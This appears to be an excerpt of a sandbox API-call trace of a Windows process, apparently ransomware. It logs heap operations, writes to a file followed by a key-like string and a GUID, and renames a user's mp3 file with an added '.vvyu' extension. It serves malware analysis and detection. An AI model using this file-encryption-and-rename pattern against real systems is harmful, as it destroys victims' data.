[0190.157] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0190.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0190.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0190.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b38 [0190.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0190.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39af0 [0190.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39ad8 [0190.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0190.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0190.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0190.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0190.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0190.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0190.161] GetCurrentThreadId () returned 0x264 [0190.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44360 [0190.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0190.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.161] GetCurrentThreadId () returned 0x264 [0190.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0190.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0190.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c829b0 [0190.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b38 [0190.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ad8 [0190.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0190.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39af0 [0190.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ac0 [0190.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b50 [0190.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0190.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b20 [0190.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b08 [0190.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b68 [0190.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b08 [0190.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0190.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0190.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ad8 [0190.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0190.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0190.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0190.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0190.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d395b8 | out: hHeap=0x6a0000) returned 1 [0190.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.174] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x9b04, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x9b04, lpOverlapped=0x0) returned 1 [0190.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.175] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9b09, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.175] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd28 [0190.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd28 | out: hHeap=0x6a0000) returned 1 [0190.176] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.176] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.177] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.177] CloseHandle (hObject=0x584) returned 1 [0190.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd28 [0190.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0190.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd28 | out: hHeap=0x6a0000) returned 1 [0190.179] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\jrz5Y.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\pe 0cuon\\jrz5y.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\pE 0cUon\\jrz5Y.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\pe 0cuon\\jrz5y.mp3.vvyu")) returned 1 [0190.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.185] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x723d10 | out: hHeap=0x6a0000) returned 1 [0190.189] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47aa1ba0, ftCreationTime.dwHighDateTime=0x1d89beb, ftLastAccessTime.dwLowDateTime=0x6a8a7260, ftLastAccessTime.dwHighDateTime=0x1d8a504, ftLastWriteTime.dwLowDateTime=0x6a8a7260, ftLastWriteTime.dwHighDateTime=0x1d8a504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xogO", cAlternateFileName="")) returned 1 [0190.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0190.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.190] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47aa1ba0, ftCreationTime.dwHighDateTime=0x1d89beb, ftLastAccessTime.dwLowDateTime=0x6a8a7260, ftLastAccessTime.dwHighDateTime=0x1d8a504, ftLastWriteTime.dwLowDateTime=0x6a8a7260, ftLastWriteTime.dwHighDateTime=0x1d8a504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xogO", cAlternateFileName="")) returned 0 [0190.190] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0190.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0190.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0190.191] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0190.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0190.191] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0190.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0190.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: 